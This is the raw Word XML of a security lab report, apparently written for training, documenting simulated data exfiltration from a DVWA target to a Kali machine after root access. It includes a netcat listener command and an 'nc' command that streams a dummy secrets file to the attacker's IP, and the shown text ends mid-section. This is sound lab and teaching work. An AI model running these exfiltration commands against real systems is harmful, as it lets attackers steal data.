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97A4A" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00FB2E94" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2E94">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Data Exfiltration Finding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42852A25" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulated Sensitive File Theft via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Post-Root-Access Stage</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="3901"/>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9"/>
        <w:gridCol w:w="6159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CC60C9" w14:paraId="4F40B350" w14:textId="77777777" w:rsidTr="00BF1CB2">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3079" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="16D04D52" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6159" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="5032FDD5" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC60C9" w14:paraId="02F9B07D" w14:textId="77777777" w:rsidTr="00BF1CB2">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3079" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="002BE33A" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EB8CF69" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Rohan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC60C9" w14:paraId="001C183B" w14:textId="77777777" w:rsidTr="00BF1CB2">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3079" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FF455E5" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B900BA9" w14:textId="501B0B2C" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00834B69" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>26/</w:t>
            </w:r>
            <w:r w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC60C9" w14:paraId="2E256105" w14:textId="77777777" w:rsidTr="00BF1CB2">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3079" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DA4DFF" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attacker Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61EF232D" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Kali Linux (192.168.100.10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC60C9" w14:paraId="7847D7DE" w14:textId="77777777" w:rsidTr="00BF1CB2">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3079" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B07D754" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Target Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26DC9B8B" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DVWA VM (192.168.100.20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC60C9" w14:paraId="525B78B6" w14:textId="77777777" w:rsidTr="00BF1CB2">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3079" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77315E93" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attack Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C062237" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Post-exploitation — Data Exfiltration (after achieving root access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC60C9" w14:paraId="3A65575B" w14:textId="77777777" w:rsidTr="00BF1CB2">
        <w:trPr>
          <w:trHeight w:val="278"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3079" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A32CB11" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Preceding Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29A502B3" w14:textId="77777777" w:rsidR="00CC60C9" w:rsidRPr="00BF1CB2" w:rsidRDefault="00CC60C9" w:rsidP="00CC60C9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalation via SUID </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BF1CB2">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> — already documented separately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26B4F8C7" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B8C410" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. What is Data Exfiltration?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56463E27" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Data exfiltration is the final and most impactful stage of a cyberattack — it is the moment when an attacker actually steals data and moves it off the target system to somewhere they control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCB3BAD" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Think of it like this: breaking into a house is the exploitation phase. Finding the safe is privilege escalation. Physically taking the valuables out of the house and driving away is data exfiltration. All the earlier steps were building toward this moment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BD5011" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In real-world attacks, this is what causes the actual damage. Everything before this — the SQL injection, the reverse shell, the privilege escalation — was just the attacker positioning themselves to be able to do this. Without exfiltration, a breach is serious but limited. With exfiltration, customer records, passwords, financial data, and intellectual property end up in the attacker's hands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B54517" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab simulation, a dummy file containing fake sensitive data (customer PII) was created on the target machine and successfully transferred to the attacker's Kali machine over a raw TCP connection using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — simulating exactly this final stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3A276" w14:textId="1B99183A" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>2. Step-by-Step — What Was Done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAC6D92" w14:textId="39EA0A2D" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Preparation — Create the Sensitive File on the Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF458AC" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">From inside the root shell (obtained via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID escalation), a dummy sensitive file was created to simulate real customer data that might exist on a production server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFAA822" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9"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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo "Confidential: Customers SSN and CC numbers" &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05237DD9" w14:textId="79D852F3" w:rsidR="00CC60C9" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Note: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used instead of /var/www/html/ because the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell environment did not have write permissions to the web root directory, despite running as effective root. /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is universally writable on all Linux systems. This is a known quirk of minimal shell environments spawned via shell-escape techniques — in a real attack, a more stable shell (e.g., bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) would be used first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500773B6" w14:textId="1244F0D8" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Set Up the Receiver on Kali (Listener First)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EEFBC9" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Before sending anything, the receiving end must be ready. On the Kali attacker machine, a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener was started on port 5555, set to save everything it receives into a file called stolen_data.txt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133E32BA" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9"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rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5555 &gt; stolen_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A37484D" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Output after running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DD9E78" w14:textId="77777777" w:rsidR="00E501C8"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rPr>
        <w:t>listening on [any] 5555 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62153C08" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>This terminal was left running and untouched while the send command was executed on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ACE1F6" w14:textId="5F4DE323" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Send the File from the Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A657926" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00CC60C9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">From the root shell on the target machine, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC60C9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to connect to the Kali listener and pipe the file contents through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E59E64" w14:textId="77777777" w:rsidR="00E501C8"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rPr>
        <w:t>nc 192.168.100.10 5555 &lt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA3846" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>What this does: nc connects to 192.168.100.10 (Kali) on port 5555, and the &lt; operator feeds the contents of secret.txt into that connection as input — effectively streaming the file across the network.</w:t>
      </w:r>
